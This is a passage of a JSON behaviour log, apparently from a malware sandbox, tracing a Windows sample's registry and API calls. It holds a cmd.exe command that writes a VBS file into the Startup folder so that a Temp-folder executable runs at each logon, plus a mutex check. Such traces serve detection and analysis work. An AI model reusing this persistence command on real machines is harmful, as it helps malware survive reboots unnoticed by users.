"KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\LocalRedirectOnly" } ], "repeated": 0, "id": 571 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Roamable" } ], "repeated": 0, "id": 572 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PreCreate" } ], "repeated": 0, "id": 573 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Stream" } ], "repeated": 0, "id": 574 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PublishExpandedPath" } ], "repeated": 0, "id": 575 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\DefinitionFlags" } ], "repeated": 0, "id": 576 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Attributes" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\Attributes" } ], "repeated": 0, "id": 577 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\FolderTypeID" } ], "repeated": 0, "id": 578 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\InitFolderHandler" } ], "repeated": 0, "id": 579 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002d0" }, { "name": "ObjectAttributesName", "value": "PropertyBag" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{B97D20BB-F46A-4C97-BA10-5E3608430854}\\PropertyBag" } ], "repeated": 0, "id": 580 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d0" } ], "repeated": 0, "id": 581 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002c4" }, { "name": "ObjectAttributesName", "value": "SessionInfo\\1" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1" } ], "repeated": 0, "id": 582 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002d0" }, { "name": "ObjectAttributesName", "value": "KnownFolders" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\KnownFolders" } ], "repeated": 0, "id": 583 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d0" } ], "repeated": 0, "id": 584 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "t\\x17\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xfe\\xff\\xff\\xff\\xf4\\x17\\x19\\x00\\x17\\xa0Ot\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00&\\xa0Ot\\xbc\\xdcCt\\x18\\x18\\x19\\x00\\x14\\x18\\x19\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 585 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 586 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002d0" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" } ], "repeated": 0, "id": 587 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d0" } ], "repeated": 0, "id": 588 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffff80000005", "pretty_return": "BUFFER_OVERFLOW", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "ValueName", "value": "Startup" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup" } ], "repeated": 1, "id": 589 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000280" }, { "name": "ValueName", "value": "Startup" }, { "name": "Type", "value": "2", "pretty_value": "REG_EXPAND_SZ" }, { "name": "Information", "value": "%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup" } ], "repeated": 0, "id": 590 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002c0" } ], "repeated": 0, "id": 591 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000280" } ], "repeated": 0, "id": 592 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" } ], "repeated": 0, "id": 593 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 594 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 595 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x0040982a", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x74990000" }, { "name": "ModuleName", "value": "windows.storage.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 596 }, { "timestamp": "2025-03-02 21:32:28,722", "thread_id": "4148", "caller": "0x004099f1", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtCreateUserProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x000002c0" }, { "name": "ThreadHandle", "value": "0x00000280" }, { "name": "ProcessDesiredAccess", "value": "0x02000000" }, { "name": "ThreadDesiredAccess", "value": "0x02000000" }, { "name": "ProcessFileName", "value": "" }, { "name": "ThreadName", "value": "" }, { "name": "ImagePathName", "value": "C:\\Windows\\system32\\cmd.exe" }, { "name": "CommandLine", "value": "C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"" }, { "name": "ProcessId", "value": "8980" } ], "repeated": 0, "id": 597 }, { "timestamp": "2025-03-02 21:32:28,925", "thread_id": "4148", "caller": "0x004099f1", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "ntdll.dll" }, { "name": "BaseAddress", "value": "0x77150000" } ], "repeated": 0, "id": 598 }, { "timestamp": "2025-03-02 21:32:28,925", "thread_id": "4148", "caller": "0x004099f1", "parentcaller": "0x0040a2a7", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "4148" }, { "name": "Module", "value": "KERNELBASE.dll" }, { "name": "Return Address", "value": "0x76518e3c" } ], "repeated": 0, "id": 599 }, { "timestamp": "2025-03-02 21:32:28,925", "thread_id": "4148", "caller": "0x004099f1", "parentcaller": "0x0040a2a7", "category": "process", "api": "CreateProcessA", "status": true, "return": "0x00000001", "arguments": [ { "name": "ApplicationName", "value": "" }, { "name": "CommandLine", "value": "C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"" }, { "name": "CreationFlags", "value": "0x00000000" }, { "name": "ProcessId", "value": "8980" }, { "name": "ThreadId", "value": "10680" }, { "name": "ProcessHandle", "value": "0x000002c0" }, { "name": "ThreadHandle", "value": "0x00000280" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 600 }, { "timestamp": "2025-03-02 21:32:28,925", "thread_id": "4148", "caller": "0x004099f9", "parentcaller": "0x0040a2a7", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "800" } ], "repeated": 0, "id": 601 }, { "timestamp": "2025-03-02 21:32:29,753", "thread_id": "4148", "caller": "0x00409a05", "parentcaller": "0x0040a2a7", "category": "process", "api": "NtTerminateProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x000002c0" }, { "name": "ExitCode", "value": "0x00000000" } ], "repeated": 0, "id": 602 }, { "timestamp": "2025-03-02 21:32:29,831", "thread_id": "4148", "caller": "0x00409a05", "parentcaller": "0x0040a2a7", "category": "system", "api": "GetSystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 603 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00409bcd", "parentcaller": "0x0040a2a7", "category": "synchronization", "api": "NtOpenMutant", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "Handle", "value": "0x00000000" }, { "name": "MutexName", "value": "qazwsxedc" } ], "repeated": 0, "id": 604 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004074e9", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 605 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004074f0", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetProcAddress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f7f0" } ], "repeated": 0, "id": 606 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004074ff", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 607 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407506", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleHandleA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d00" } ], "repeated": 0, "id": 608 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407516", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 609 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407519", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758810d0" } ], "repeated": 0, "id": 610 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040752d", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 611 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407530", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880ba0" } ], "repeated": 0, "id": 612 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407544", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 613 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407547", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 614 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407555", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 615 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407558", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 616 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407565", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 617 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407568", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 618 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407576", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 619 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407579", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75872e60" } ], "repeated": 0, "id": 620 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x0040758d", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 621 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x00407590", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758831e0" } ], "repeated": 0, "id": 622 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075a4", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 623 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075a7", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833a0" } ], "repeated": 0, "id": 624 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075bb", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 625 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075be", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833b0" } ], "repeated": 0, "id": 626 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075cf", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 627 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075d2", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835d0" } ], "repeated": 0, "id": 628 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075e3", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 629 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075e6", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ReadFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883730" } ], "repeated": 0, "id": 630 }, { "timestamp": "2025-03-02 21:32:29,909", "thread_id": "4148", "caller": "0x004075fa", "parentcaller": "0x00409bd6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" 